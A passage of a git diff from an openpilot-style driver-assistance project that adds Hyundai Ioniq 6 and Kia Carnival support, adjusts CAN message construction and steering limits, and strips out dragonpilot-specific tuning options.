cp.vl["TCS13"]["ACCEnable"] != 0 # 0 ACC CONTROL ENABLED, 1-3 ACC CONTROL DISABLED - #dp - ret.brakeLightsDEPRECATED = bool(cp.vl["TCS13"]["BrakeLight"] or ret.brakePressed or ret.brakeHoldActive or ret.parkingBrake) if self.CP.carFingerprint in (HYBRID_CAR | EV_CAR): if self.CP.carFingerprint in HYBRID_CAR: @@ -292,9 +288,6 @@ class CarState(CarStateBase): ("SAS_Angle", "SAS11"), ("SAS_Speed", "SAS11"), - #dp - ("Cluster_Engine_RPM", "TCU_DCT13"), - ("BrakeLight", "TCS13"), ] checks = [ # address, frequency @@ -309,7 +302,6 @@ class CarState(CarStateBase): ("CGW4", 5), ("WHL_SPD11", 50), ("SAS11", 100), - ("TCU_DCT13", 100), ] if not CP.openpilotLongitudinalControl and CP.carFingerprint not in CAMERA_SCC_CAR: diff --git a/selfdrive/car/hyundai/hyundaican.py b/selfdrive/car/hyundai/hyundaican.py index afd112326..dc5a5b628 100644 --- a/selfdrive/car/hyundai/hyundaican.py +++ b/selfdrive/car/hyundai/hyundaican.py @@ -7,7 +7,23 @@ def create_lkas11(packer, frame, car_fingerprint, apply_steer, steer_req, torque_fault, lkas11, sys_warning, sys_state, enabled, left_lane, right_lane, left_lane_depart, right_lane_depart): - values = lkas11 + values = {s: lkas11[s] for s in [ + "CF_Lkas_LdwsActivemode", + "CF_Lkas_LdwsSysState", + "CF_Lkas_SysWarning", + "CF_Lkas_LdwsLHWarning", + "CF_Lkas_LdwsRHWarning", + "CF_Lkas_HbaLamp", + "CF_Lkas_FcwBasReq", + "CF_Lkas_HbaSysState", + "CF_Lkas_FcwOpt", + "CF_Lkas_HbaOpt", + "CF_Lkas_FcwSysState", + "CF_Lkas_FcwCollisionWarning", + "CF_Lkas_FusionState", + "CF_Lkas_FcwOpt_USM", + "CF_Lkas_LdwsOpt_USM", + ]} values["CF_Lkas_LdwsSysState"] = sys_state values["CF_Lkas_SysWarning"] = 3 if sys_warning else 0 values["CF_Lkas_LdwsLHWarning"] = left_lane_depart @@ -79,7 +95,20 @@ def create_lkas11(packer, frame, car_fingerprint, apply_steer, steer_req, def create_clu11(packer, frame, clu11, button, car_fingerprint): - values = clu11 + values = {s: clu11[s] for s in [ + "CF_Clu_CruiseSwState", + "CF_Clu_CruiseSwMain", + "CF_Clu_SldMainSW", + "CF_Clu_ParityBit1", + "CF_Clu_VanzDecimal", + "CF_Clu_Vanz", + "CF_Clu_SPEED_UNIT", + "CF_Clu_DetentOut", + "CF_Clu_RheostatLevel", + "CF_Clu_CluInfo", + "CF_Clu_AmpInfo", + "CF_Clu_AliveCnt1", + ]} values["CF_Clu_CruiseSwState"] = button values["CF_Clu_AliveCnt1"] = frame % 0x10 # send buttons to camera on camera-scc based cars diff --git a/selfdrive/car/hyundai/hyundaicanfd.py b/selfdrive/car/hyundai/hyundaicanfd.py index c727649ff..e78e02ae5 100644 --- a/selfdrive/car/hyundai/hyundaicanfd.py +++ b/selfdrive/car/hyundai/hyundaicanfd.py @@ -60,11 +60,11 @@ def create_steering_messages(packer, CP, CAN, enabled, lat_active, apply_steer): return ret -def create_cam_0x2a4(packer, CAN, camera_values): - camera_values.update({ - "BYTE7": 0, - }) - return packer.make_can_msg("CAM_0x2a4", CAN.ACAN, camera_values) +def create_cam_0x2a4(packer, CAN, cam_0x2a4): + values = {f"BYTE{i}": cam_0x2a4[f"BYTE{i}"] for i in range(3, 24)} + values['COUNTER'] = cam_0x2a4['COUNTER'] + values["BYTE7"] = 0 + return packer.make_can_msg("CAM_0x2a4", CAN.ACAN, values) def create_buttons(packer, CP, CAN, cnt, btn): values = { @@ -76,10 +76,33 @@ def create_buttons(packer, CP, CAN, cnt, btn): bus = CAN.ECAN if CP.flags & HyundaiFlags.CANFD_HDA2 else CAN.CAM return packer.make_can_msg("CRUISE_BUTTONS", bus, values) -def create_acc_cancel(packer, CAN, cruise_info_copy): - values = cruise_info_copy +def create_acc_cancel(packer, CP, CAN, cruise_info_copy): + # TODO: why do we copy different values here? + if CP.flags & HyundaiFlags.CANFD_CAMERA_SCC.value: + values = {s: cruise_info_copy[s] for s in [ + "COUNTER", + "CHECKSUM", + "NEW_SIGNAL_1", + "MainMode_ACC", + "ACCMode", + "ZEROS_9", + "CRUISE_STANDSTILL", + "ZEROS_5", + "DISTANCE_SETTING", + "VSetDis", + ]} + else: + values = {s: cruise_info_copy[s] for s in [ + "COUNTER", + "CHECKSUM", + "ACCMode", + "VSetDis", + "CRUISE_STANDSTILL", + ]} values.update({ "ACCMode": 4, + "aReqRaw": 0.0, + "aReqValue": 0.0, }) return packer.make_can_msg("SCC_CONTROL", CAN.ECAN, values) diff --git a/selfdrive/car/hyundai/interface.py b/selfdrive/car/hyundai/interface.py index 4073bb3ff..66bf303de 100644 --- a/selfdrive/car/hyundai/interface.py +++ b/selfdrive/car/hyundai/interface.py @@ -8,7 +8,6 @@ from selfdrive.car.hyundai.radar_interface import RADAR_START_ADDR from selfdrive.car import STD_CARGO_KG, create_button_event, scale_tire_stiffness, get_safety_config from selfdrive.car.interfaces import CarInterfaceBase from selfdrive.car.disable_ecu import disable_ecu -from common.params import Params Ecu = car.CarParams.Ecu ButtonType = car.CarState.ButtonEvent.Type @@ -27,7 +26,7 @@ class CarInterface(CarInterfaceBase): # These cars have been put into dashcam only due to both a lack of users and test coverage. # These cars likely still work fine. Once a user confirms each car works and a test route is # added to selfdrive/car/tests/routes.py, we can remove it from this list. - ret.dashcamOnly = candidate in {CAR.KIA_OPTIMA_H, } + ret.dashcamOnly = candidate in {CAR.KIA_OPTIMA_H, CAR.IONIQ_6} hda2 = Ecu.adas in [fw.ecu for fw in car_fw] CAN = CanBus(None, hda2, fingerprint) @@ -187,10 +186,10 @@ class CarInterface(CarInterfaceBase): ret.wheelbase = 2.9 ret.steerRatio = 16. tire_stiffness_factor = 0.65 - elif candidate == CAR.IONIQ_5: - ret.mass = 2012 + STD_CARGO_KG - ret.wheelbase = 3.0 - ret.steerRatio = 16. + elif candidate in (CAR.IONIQ_5, CAR.IONIQ_6): + ret.mass = 1948 + STD_CARGO_KG + ret.wheelbase = 2.97 + ret.steerRatio = 14.26 tire_stiffness_factor = 0.65 elif candidate == CAR.KIA_SPORTAGE_HYBRID_5TH_GEN: ret.mass = 1767. + STD_CARGO_KG # SX Prestige trim support only @@ -203,6 +202,10 @@ class CarInterface(CarInterfaceBase): ret.mass = 3957 * CV.LB_TO_KG + STD_CARGO_KG else: ret.mass = 4537 * CV.LB_TO_KG + STD_CARGO_KG + elif candidate == CAR.KIA_CARNIVAL_4TH_GEN: + ret.mass = 2087. + STD_CARGO_KG + ret.wheelbase = 3.09 + ret.steerRatio = 14.23 # Genesis elif candidate == CAR.GENESIS_GV60_EV_1ST_GEN: @@ -245,9 +248,6 @@ class CarInterface(CarInterfaceBase): ret.longitudinalTuning.kiV = [0.0] ret.experimentalLongitudinalAvailable = candidate not in (LEGACY_SAFETY_MODE_CAR | CAMERA_SCC_CAR) ret.openpilotLongitudinalControl = experimental_long and ret.experimentalLongitudinalAvailable - params = Params() - if int(params.get("dp_atl").decode('utf-8')) == 1: - ret.openpilotLongitudinalControl = False ret.pcmCruise = not ret.openpilotLongitudinalControl ret.stoppingControl = True @@ -264,10 +264,6 @@ class CarInterface(CarInterfaceBase): ret.enableBsm = 0x58b in fingerprint[0] # *** panda safety config *** - CarInterfaceBase.dp_lat_tune_collection(candidate, ret.latTuneCollection) - CarInterfaceBase.configure_dp_tune(ret.lateralTuning, ret.latTuneCollection) - - # panda safety config if candidate in CANFD_CAR: cfgs = [get_safety_config(car.CarParams.SafetyModel.hyundaiCanfd), ] if CAN.ECAN >= 4: @@ -307,7 +303,6 @@ class CarInterface(CarInterfaceBase): # mass and CG position, so all cars will have approximately similar dyn behaviors ret.tireStiffnessFront, ret.tireStiffnessRear = scale_tire_stiffness(ret.mass, ret.wheelbase, ret.centerToFront, tire_stiffness_factor=tire_stiffness_factor) - params.put("dp_lateral_steer_rate_cost", "0.5") return ret @staticmethod diff --git a/selfdrive/car/hyundai/values.py b/selfdrive/car/hyundai/values.py index dab6fefad..1258554ac 100644 --- a/selfdrive/car/hyundai/values.py +++ b/selfdrive/car/hyundai/values.py @@ -17,7 +17,7 @@ class CarControllerParams: ACCEL_MIN = -3.5 # m/s ACCEL_MAX = 2.0 # m/s - def __init__(self, CP): + def __init__(self, CP, vEgoRaw=100.): self.STEER_DELTA_UP = 3 self.STEER_DELTA_DOWN = 7 self.STEER_DRIVER_ALLOWANCE = 50 @@ -27,12 +27,19 @@ class CarControllerParams: self.STEER_STEP = 1 # 100 Hz if CP.carFingerprint in CANFD_CAR: - self.STEER_MAX = 270 - self.STEER_DRIVER_ALLOWANCE = 250 + # self.STEER_MAX = 270 + # self.STEER_DRIVER_ALLOWANCE = 250 + # self.STEER_DRIVER_MULTIPLIER = 2 + # self.STEER_THRESHOLD = 250 + # self.STEER_DELTA_UP = 2 + # self.STEER_DELTA_DOWN = 3 + # rick - taco tune + self.STEER_MAX = 384 if vEgoRaw < 11. else 330 + self.STEER_DRIVER_ALLOWANCE = 350 self.STEER_DRIVER_MULTIPLIER = 2 - self.STEER_THRESHOLD = 250 - self.STEER_DELTA_UP = 2 - self.STEER_DELTA_DOWN = 3 + self.STEER_THRESHOLD = 350 + self.STEER_DELTA_UP = 10 if vEgoRaw < 11. else 2 + self.STEER_DELTA_DOWN = 10 if vEgoRaw < 11. else 3 # To determine the limit for your car, find the maximum value that the stock LKAS will request. # If the max stock LKAS request is <384, add your car to this list. @@ -92,6 +99,7 @@ class CAR: VELOSTER = "HYUNDAI VELOSTER 2019" SONATA_HYBRID = "HYUNDAI SONATA HYBRID 2021" IONIQ_5 = "HYUNDAI IONIQ 5 2022" + IONIQ_6 = "HYUNDAI IONIQ 6 2023" TUCSON_4TH_GEN = "HYUNDAI TUCSON 4TH GEN" TUCSON_HYBRID_4TH_GEN = "HYUNDAI TUCSON HYBRID 4TH GEN" SANTA_CRUZ_1ST_GEN = "HYUNDAI SANTA CRUZ 1ST GEN" @@ -118,6 +126,7 @@ class CAR: KIA_STINGER_2022 = "KIA STINGER 2022" KIA_CEED = "KIA CEED INTRO ED 2019" KIA_EV6 = "KIA EV6 2022" + KIA_CARNIVAL_4TH_GEN = "KIA CARNIVAL 4TH GEN" # Genesis GENESIS_GV60_EV_1ST_GEN = "GENESIS GV60 ELECTRIC 1ST GEN" @@ -183,12 +192,16 @@ CAR_INFO: Dict[str, Optional[Union[HyundaiCarInfo, List[HyundaiCarInfo]]]] = { HyundaiCarInfo("Kia Telluride 2020-22", "All", car_parts=CarParts.common([CarHarness.hyundai_h])), ], CAR.VELOSTER: HyundaiCarInfo("Hyundai Veloster 2019-20", min_enable_speed=5. * CV.MPH_TO_MS, car_parts=CarParts.common([CarHarness.hyundai_e])), - CAR.SONATA_HYBRID: HyundaiCarInfo("Hyundai Sonata Hybrid 2020-22", "All", car_parts=CarParts.common([CarHarness.hyundai_a])), + CAR.SONATA_HYBRID: HyundaiCarInfo("Hyundai Sonata Hybrid 2020-23", "All", car_parts=CarParts.common([CarHarness.hyundai_a])), CAR.IONIQ_5: [ HyundaiCarInfo("Hyundai Ioniq 5 (Southeast Asia only) 2022-23", "All", car_parts=CarParts.common([CarHarness.hyundai_q])), HyundaiCarInfo("Hyundai Ioniq 5 (without HDA II) 2022-23", "Highway Driving Assist", car_parts=CarParts.common([CarHarness.hyundai_k])), HyundaiCarInfo("Hyundai Ioniq 5 (with HDA II) 2022-23", "Highway Driving Assist II", car_parts=CarParts.common([CarHarness.hyundai_q])), ], + CAR.IONIQ_6: [ + HyundaiCarInfo("Hyundai Ioniq 6 (without HDA II) 2023", "Highway Driving Assist", car_parts=CarParts.common([CarHarness.hyundai_k])), # TODO: unknown + HyundaiCarInfo("Hyundai Ioniq 6 (with HDA II) 2023", "Highway Driving Assist II", car_parts=CarParts.common([CarHarness.hyundai_p])), + ], CAR.TUCSON_4TH_GEN: [ HyundaiCarInfo("Hyundai Tucson 2022", car_parts=CarParts.common([CarHarness.hyundai_n])), HyundaiCarInfo("Hyundai Tucson 2023", "All", car_parts=CarParts.common([CarHarness.hyundai_n])), @@ -241,6 +254,10 @@ CAR_INFO: Dict[str, Optional[Union[HyundaiCarInfo, List[HyundaiCarInfo]]]] = { HyundaiCarInfo("Kia EV6 (without HDA II) 2022-23", "Highway Driving Assist", car_parts=CarParts.common([CarHarness.hyundai_l])), HyundaiCarInfo("Kia EV6 (with HDA II) 2022-23", "Highway Driving Assist II", car_parts=CarParts.common([CarHarness.hyundai_p])) ], + CAR.KIA_CARNIVAL_4TH_GEN: [ + HyundaiCarInfo("Kia Carnival 2023", car_parts=CarParts.common([CarHarness.hyundai_a])), + HyundaiCarInfo("Kia Carnival (China only) 2023", car_parts=CarParts.common([CarHarness.hyundai_k])) + ], # Genesis CAR.GENESIS_GV60_EV_1ST_GEN: [ @@ -632,6 +649,7 @@ FW_VERSIONS = { b'\xf1\x00DN8_ SCC F-CUP 1.00 1.02 99110-L1000 ', b'\xf1\x00DN8_ SCC FHCUP 1.00 1.00 99110-L0000 ', b'\xf1\x00DN8_ SCC FHCUP 1.00 1.01 99110-L1000 ', + b'\xf1\x00DN8_ SCC FHCUP 1.00 1.02 99110-L1000 ', ], (Ecu.abs, 0x7d1, None): [ b'\xf1\x00DN ESC \x07 106 \x07\x01 58910-L0100', @@ -646,6 +664,7 @@ FW_VERSIONS = { b'\xf1\x8758910-L0100\xf1\x00DN ESC \x06 106 \x07\x01 58910-L0100', b'\xf1\x8758910-L0100\xf1\x00DN ESC \x07 104\x19\x08\x01 58910-L0100', b'\xf1\x00DN ESC \x06 106 \x07\x01 58910-L0100', + b'\xf1\x00DN ESC \x06 107 \x07\x03 58910-L1300', ], (Ecu.engine, 0x7e0, None): [ b'\xf1\x81HM6M1_0a0_F00', @@ -660,6 +679,7 @@ FW_VERSIONS = { b'\xf1\x87391162M003', b'\xf1\x87391162M013', b'\xf1\x87391162M023', + b'\xf1\x87391162M010', b'HM6M1_0a0_F00', b'HM6M1_0a0_G20', b'HM6M2_0a0_BD0', @@ -683,11 +703,13 @@ FW_VERSIONS = { b'\xf1\x8756310L0210\x00\xf1\x00DN8 MDPS C 1.00 1.01 56310L0210\x00 4DNAC101', b'\xf1\x8757700-L0000\xf1\x00DN8 MDPS R 1.00 1.00 57700-L0000 4DNAP100', b'\xf1\x00DN8 MDPS R 1.00 1.00 57700-L0000 4DNAP101', + b'\xf1\x00DN8 MDPS R 1.00 1.02 57700-L1000 4DNDP105', b'\xf1\x00DN8 MDPS C 1.00 1.01 56310-L0210 4DNAC102', b'\xf1\x00DN8 MDPS C 1.00 1.01 56310L0200\x00 4DNAC102', ], (Ecu.fwdCamera, 0x7c4, None): [ b'\xf1\x00DN8 MFC AT KOR LHD 1.00 1.02 99211-L1000 190422', + b'\xf1\x00DN8 MFC AT KOR LHD 1.00 1.04 99211-L1000 191016', b'\xf1\x00DN8 MFC AT RUS LHD 1.00 1.03 99211-L1000 190705', b'\xf1\x00DN8 MFC AT USA LHD 1.00 1.00 99211-L0000 190716', b'\xf1\x00DN8 MFC AT USA LHD 1.00 1.01 99211-L0000 191016', @@ -700,6 +722,7 @@ FW_VERSIONS = { b'\xf1\x00bcsh8p54 U903\x00\x00\x00\x00\x00\x00SDN8T16NB0z{\xd4v', b'\xf1\x00bcsh8p54 U913\x00\x00\x00\x00\x00\x00SDN8T16NB1\xe3\xc10\xa1', b'\xf1\x00bcsh8p54 U913\x00\x00\x00\x00\x00\x00SDN8T16NB2\n\xdd^\xbc', + b'\xf1\x00bcsh8p54 U903\x00\x00\x00\x00\x00\x00SDN8T16KB05\x95h%', b'\xf1\x00HT6TA260BLHT6TA800A1TDN8C20KS4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00', b'\xf1\x00HT6TA260BLHT6TA810A1TDN8M25GS0\x00\x00\x00\x00\x00\x00\xaa\x8c\xd9p', b'\xf1\x00HT6WA250BLHT6WA910A1SDN8G25NB1\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00', @@ -1666,8 +1689,8 @@ FW_VERSIONS = { }, CAR.SONATA_HYBRID: { (Ecu.fwdRadar, 0x7d0, None): [ - b'\xf1\000DNhe SCC FHCUP 1.00 1.02 99110-L5000 ', - b'\xf1\x8799110L5000\xf1\000DNhe SCC FHCUP 1.00 1.02 99110-L5000 ', + b'\xf1\x00DNhe SCC FHCUP 1.00 1.02 99110-L5000 ', + b'\xf1\x8799110L5000\xf1\x00DNhe SCC FHCUP 1.00 1.02 99110-L5000 ', b'\xf1\000DNhe SCC F-CUP 1.00 1.02 99110-L5000 ', b'\xf1\x8799110L5000\xf1\000DNhe SCC F-CUP 1.00 1.02 99110-L5000 ', ], @@ -1675,23 +1698,27 @@ FW_VERSIONS = { b'\xf1\x8756310-L5500\xf1\x00DN8 MDPS C 1.00 1.02 56310-L5500 4DNHC102', b'\xf1\x8756310-L5450\xf1\x00DN8 MDPS C 1.00 1.02 56310-L5450 4DNHC102', b'\xf1\x8756310-L5450\xf1\000DN8 MDPS C 1.00 1.03 56310-L5450 4DNHC103', + b'\xf1\x00DN8 MDPS C 1.00 1.03 56310L5450\x00 4DNHC104', + b'\xf1\x8756310L5450\x00\xf1\x00DN8 MDPS C 1.00 1.03 56310L5450\x00 4DNHC104', ], (Ecu.fwdCamera, 0x7c4, None): [ b'\xf1\x00DN8HMFC AT USA LHD 1.00 1.04 99211-L1000 191016', b'\xf1\x00DN8HMFC AT USA LHD 1.00 1.05 99211-L1000 201109', b'\xf1\000DN8HMFC AT USA LHD 1.00 1.06 99211-L1000 210325', + b'\xf1\x00DN8HMFC AT USA LHD 1.00 1.07 99211-L1000 211223', ], (Ecu.transmission, 0x7e1, None): [ b'\xf1\000PSBG2333 E14\x00\x00\x00\x00\x00\x00\x00TDN2H20SA6N\xc2\xeeW', b'\xf1\x87959102T250\x00\x00\x00\x00\x00\xf1\x81E09\x00\x00\x00\x00\x00\x00\x00\xf1\x00PSBG2323 E09\x00\x00\x00\x00\x00\x00\x00TDN2H20SA5\x97R\x88\x9e', b'\xf1\000PSBG2323 E09\000\000\000\000\000\000\000TDN2H20SA5\x97R\x88\x9e', - b'\xf1\000PSBG2333 E16\000\000\000\000\000\000\000TDN2H20SA7\0323\xf9\xab', - b'\xf1\x87PCU\000\000\000\000\000\000\000\000\000\xf1\x81E16\000\000\000\000\000\000\000\xf1\000PSBG2333 E16\000\000\000\000\000\000\000TDN2H20SA7\0323\xf9\xab', + b'\xf1\x00PSBG2333 E16\x00\x00\x00\x00\x00\x00\x00TDN2H20SA7\x1a3\xf9\xab', + b'\xf1\x87PCU\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf1\x81E16\x00\x00\x00\x00\x00\x00\x00\xf1\x00PSBG2333 E16\x00\x00\x00\x00\x00\x00\x00TDN2H20SA7\x1a3\xf9\xab', b'\xf1\x87959102T250\x00\x00\x00\x00\x00\xf1\x81E14\x00\x00\x00\x00\x00\x00\x00\xf1\x00PSBG2333 E14\x00\x00\x00\x00\x00\x00\x00TDN2H20SA6N\xc2\xeeW', ], (Ecu.engine, 0x7e0, None): [ b'\xf1\x87391162J012', b'\xf1\x87391162J013', + b'\xf1\x87391162J014', b'\xf1\x87391062J002', ], }, @@ -1751,11 +1778,18 @@ FW_VERSIONS = { b'\xf1\x00NE1 MFC AT USA LHD 1.00 1.03 99211-GI010 220401', ], }, + CAR.IONIQ_6: { + (Ecu.fwdRadar, 0x7d0, None): [ + b'\xf1\x00CE__ RDR ----- 1.00 1.01 99110-KL000 ', + ], + (Ecu.fwdCamera, 0x7c4, None): [ + b'\xf1\x00CE MFC AT USA LHD 1.00 1.04 99211-KL000 221213', + ], + }, CAR.TUCSON_4TH_GEN: { (Ecu.fwdCamera, 0x7c4, None): [ b'\xf1\x00NX4 FR_CMR AT USA LHD 1.00 1.00 99211-N9210 14G', b'\xf1\x00NX4 FR_CMR AT USA LHD 1.00 1.01 99211-N9240 14T', - b'\xf1\x00NX4 FR_CMR AT USA LHD 1.00 1.00 99211-CW010 14X', ], (Ecu.fwdRadar, 0x7d0, None): [ b'\xf1\x00NX4__ 1.00 1.00 99110-N9100 ', @@ -1853,6 +1887,16 @@ FW_VERSIONS = { b'\xf1\x00JX1_ SCC FHCUP 1.00 1.01 99110-T6100 ', ], }, + CAR.KIA_CARNIVAL_4TH_GEN: { + (Ecu.fwdCamera, 0x7c4, None): [ + b'\xf1\x00KA4 MFC AT USA LHD 1.00 1.06 99210-R0000 220221', + b'\xf1\x00KA4CMFC AT CHN LHD 1.00 1.01 99211-I4000 210525', + ], + (Ecu.fwdRadar, 0x7d0, None): [ + b'\xf1\x00KA4_ SCC FHCUP 1.00 1.03 99110-R0000 ', + b'\xf1\x00KA4c SCC FHCUP 1.00 1.01 99110-I4000 ', + ], + }, } CHECKSUM = { @@ -1867,16 +1911,16 @@ CAN_GEARS = { "use_elect_gears": {CAR.KIA_NIRO_EV, CAR.KIA_NIRO_PHEV, CAR.KIA_NIRO_HEV_2021, CAR.KIA_OPTIMA_H, CAR.IONIQ_EV_LTD, CAR.KONA_EV, CAR.IONIQ, CAR.IONIQ_EV_2020, CAR.IONIQ_PHEV, CAR.ELANTRA_HEV_2021, CAR.SONATA_HYBRID, CAR.KONA_HEV, CAR.IONIQ_HEV_2022, CAR.SANTA_FE_HEV_2022, CAR.SANTA_FE_PHEV_2022, CAR.IONIQ_PHEV_2019, CAR.KONA_EV_2022, CAR.KIA_K5_HEV_2020}, } -CANFD_CAR = {CAR.KIA_EV6, CAR.IONIQ_5, CAR.TUCSON_4TH_GEN, CAR.TUCSON_HYBRID_4TH_GEN, CAR.KIA_SPORTAGE_HYBRID_5TH_GEN, CAR.SANTA_CRUZ_1ST_GEN, CAR.KIA_SPORTAGE_5TH_GEN, CAR.GENESIS_GV70_1ST_GEN, CAR.KIA_SORENTO_PHEV_4TH_GEN, CAR.GENESIS_GV60_EV_1ST_GEN, CAR.KIA_SORENTO_4TH_GEN, CAR.KIA_NIRO_HEV_2ND_GEN, CAR.KIA_NIRO_EV_2ND_GEN, CAR.GENESIS_GV80} +CANFD_CAR = {CAR.KIA_EV6, CAR.IONIQ_5, CAR.IONIQ_6, CAR.TUCSON_4TH_GEN, CAR.TUCSON_HYBRID_4TH_GEN, CAR.KIA_SPORTAGE_HYBRID_5TH_GEN, CAR.SANTA_CRUZ_1ST_GEN, CAR.KIA_SPORTAGE_5TH_GEN, CAR.GENESIS_GV70_1ST_GEN, CAR.KIA_SORENTO_PHEV_4TH_GEN, CAR.GENESIS_GV60_EV_1ST_GEN, CAR.KIA_SORENTO_4TH_GEN, CAR.KIA_NIRO_HEV_2ND_GEN, CAR.KIA_NIRO_EV_2ND_GEN, CAR.GENESIS_GV80, CAR.KIA_CARNIVAL_4TH_GEN} # The radar does SCC on these cars when HDA I, rather than the camera -CANFD_RADAR_SCC_CAR = {CAR.GENESIS_GV70_1ST_GEN, CAR.KIA_SORENTO_PHEV_4TH_GEN, CAR.KIA_SORENTO_4TH_GEN, CAR.GENESIS_GV80} +CANFD_RADAR_SCC_CAR = {CAR.GENESIS_GV70_1ST_GEN, CAR.KIA_SORENTO_PHEV_4TH_GEN, CAR.KIA_SORENTO_4TH_GEN, CAR.GENESIS_GV80, CAR.KIA_CARNIVAL_4TH_GEN} # The camera does SCC on these cars, rather than the radar CAMERA_SCC_CAR = {CAR.KONA_EV_2022, } HYBRID_CAR = {CAR.IONIQ_PHEV, CAR.ELANTRA_HEV_2021, CAR.KIA_NIRO_PHEV, CAR.KIA_NIRO_HEV_2021, CAR.SONATA_HYBRID, CAR.KONA_HEV, CAR.IONIQ, CAR.IONIQ_HEV_2022, CAR.SANTA_FE_HEV_2022, CAR.SANTA_FE_PHEV_2022, CAR.IONIQ_PHEV_2019, CAR.TUCSON_HYBRID_4TH_GEN, CAR.KIA_SPORTAGE_HYBRID_5TH_GEN, CAR.KIA_SORENTO_PHEV_4TH_GEN, CAR.KIA_K5_HEV_2020, CAR.KIA_NIRO_HEV_2ND_GEN} # these cars use a different gas signal -EV_CAR = {CAR.IONIQ_EV_2020, CAR.IONIQ_EV_LTD, CAR.KONA_EV, CAR.KIA_NIRO_EV, CAR.KIA_NIRO_EV_2ND_GEN, CAR.KONA_EV_2022, CAR.KIA_EV6, CAR.IONIQ_5, CAR.GENESIS_GV60_EV_1ST_GEN} +EV_CAR = {CAR.IONIQ_EV_2020, CAR.IONIQ_EV_LTD, CAR.KONA_EV, CAR.KIA_NIRO_EV, CAR.KIA_NIRO_EV_2ND_GEN, CAR.KONA_EV_2022, CAR.KIA_EV6, CAR.IONIQ_5, CAR.IONIQ_6, CAR.GENESIS_GV60_EV_1ST_GEN} # these cars require a special panda safety mode due to missing counters and checksums in the messages LEGACY_SAFETY_MODE_CAR = {CAR.HYUNDAI_GENESIS, CAR.IONIQ_EV_2020, CAR.IONIQ_EV_LTD, CAR.IONIQ_PHEV, CAR.IONIQ, CAR.KONA_EV, CAR.KIA_SORENTO, CAR.SONATA_LF, CAR.KIA_OPTIMA_G4, CAR.KIA_OPTIMA_G4_FL, CAR.VELOSTER, @@ -1931,6 +1975,7 @@ DBC = { CAR.TUCSON_4TH_GEN: dbc_dict('hyundai_canfd', None), CAR.TUCSON_HYBRID_4TH_GEN: dbc_dict('hyundai_canfd', None), CAR.IONIQ_5: dbc_dict('hyundai_canfd', None), + CAR.IONIQ_6: dbc_dict('hyundai_canfd', None), CAR.SANTA_CRUZ_1ST_GEN: dbc_dict('hyundai_canfd', None), CAR.KIA_SPORTAGE_5TH_GEN: dbc_dict('hyundai_canfd', None), CAR.KIA_SPORTAGE_HYBRID_5TH_GEN: dbc_dict('hyundai_canfd', None), @@ -1941,4 +1986,5 @@ DBC = { CAR.KIA_NIRO_HEV_2ND_GEN: dbc_dict('hyundai_canfd', None), CAR.KIA_NIRO_EV_2ND_GEN: dbc_dict('hyundai_canfd', None), CAR.GENESIS_GV80: dbc_dict('hyundai_canfd', None), + CAR.KIA_CARNIVAL_4TH_GEN: dbc_dict('hyundai_canfd', None), } diff --git a/selfdrive/car/interfaces.py b/selfdrive/car/interfaces.py index a0f1ca3b5..ec9f4a0f0 100644 --- a/selfdrive/car/interfaces.py +++ b/selfdrive/car/interfaces.py @@ -14,8 +14,6 @@ from selfdrive.car import apply_hysteresis, gen_empty_fingerprint, scale_rot_ine from selfdrive.controls.lib.drive_helpers import V_CRUISE_MAX, get_friction from selfdrive.controls.lib.events import Events from selfdrive.controls.lib.vehicle_model import VehicleModel -from common.params import Params -from selfdrive.car.lat_controller_helper import configure_pid_tune, configure_lqr_tune ButtonType = car.CarState.ButtonEvent.Type GearShifter = car.CarState.GearShifter @@ -86,10 +84,6 @@ class CarInterfaceBase(ABC): if CarController is not None: self.CC = CarController(self.cp.dbc_name, CP, self.VM) - # dp - self.dp_last_cruise_actual_enabled = False - self.dragonconf = None - @staticmethod def get_pid_accel_limits(CP, current_speed, cruise_speed): return ACCEL_MIN, ACCEL_MAX @@ -137,8 +131,7 @@ class CarInterfaceBase(ABC): def get_steer_feedforward_function(self): return self.get_steer_feedforward_default - @staticmethod - def torque_from_lateral_accel_linear(lateral_accel_value: float, torque_params: car.CarParams.LateralTorqueTuning, + def torque_from_lateral_accel_linear(self, lateral_accel_value: float, torque_params: car.CarParams.LateralTorqueTuning, lateral_accel_error: float, lateral_accel_deadzone: float, friction_compensation: bool) -> float: # The default is a linear relationship between torque and lateral acceleration (accounting for road roll and steering friction) friction = get_friction(lateral_accel_error, lateral_accel_deadzone, FRICTION_THRESHOLD, torque_params, friction_compensation) @@ -198,53 +191,11 @@ class CarInterfaceBase(ABC): tune.torque.latAccelOffset = 0.0 tune.torque.steeringAngleDeadzoneDeg = steering_angle_deadzone_deg - @staticmethod - def configure_dp_tune(stock, collection): - try: - dp_lateral_tune = int(Params().get("dp_lateral_tune").decode('utf-8')) - except: - dp_lateral_tune = 0 - - stock_tune = 0 - if stock.which() == 'pid': - stock_tune = 1 - collection.pid = stock.pid - elif stock.which() == 'lqr': - stock_tune = 2 - collection.lqr = stock.lqr - elif stock.which() == 'torque': - stock_tune = 3 - collection.torque = stock.torque - elif stock.which() == 'indi': - stock_tune = 4 - - if dp_lateral_tune > 0 and dp_lateral_tune != stock_tune: - if dp_lateral_tune == 1 and collection.pid is not None: - stock.pid = collection.pid - elif dp_lateral_tune == 2 and collection.lqr is not None: - stock.lqr = collection.lqr - elif dp_lateral_tune == 3 and collection.torque is not None: - stock.torque = collection.torque - - @staticmethod - def dp_lat_tune_collection(candidate, collection, steering_angle_deadzone_deg=0.0, use_steering_angle=True): - for i in range(1, 4): - # pid - car specific - if i == 1: - configure_pid_tune(candidate, collection) - # lqr - all uses RAV4 one - elif i == 2: - configure_lqr_tune(candidate, collection) - # torque - car specific as per lookup table - elif i == 3: - CarInterfaceBase.configure_torque_tune(candidate, collection, steering_angle_deadzone_deg, use_steering_angle) - @abstractmethod def _update(self, c: car.CarControl) -> car.CarState: pass - def update(self, c: car.CarControl, can_strings: List[bytes], dragonconf) -> car.CarState: - self.dragonconf = dragonconf + def update(self, c: car.CarControl, can_strings: List[bytes]) -> car.CarState: # parse can for cp in self.can_parsers: if cp is not None: @@ -302,7 +253,7 @@ class CarInterfaceBase(ABC): events.add(EventName.stockFcw) if cs_out.stockAeb: events.add(EventName.stockAeb) - if self.dragonconf.dpSpeedCheck and cs_out.vEgo > MAX_CTRL_SPEED: + if cs_out.vEgo > MAX_CTRL_SPEED: events.add(EventName.speedTooHigh) if cs_out.cruiseState.nonAdaptive: events.add(EventName.wrongCruiseMode) diff --git 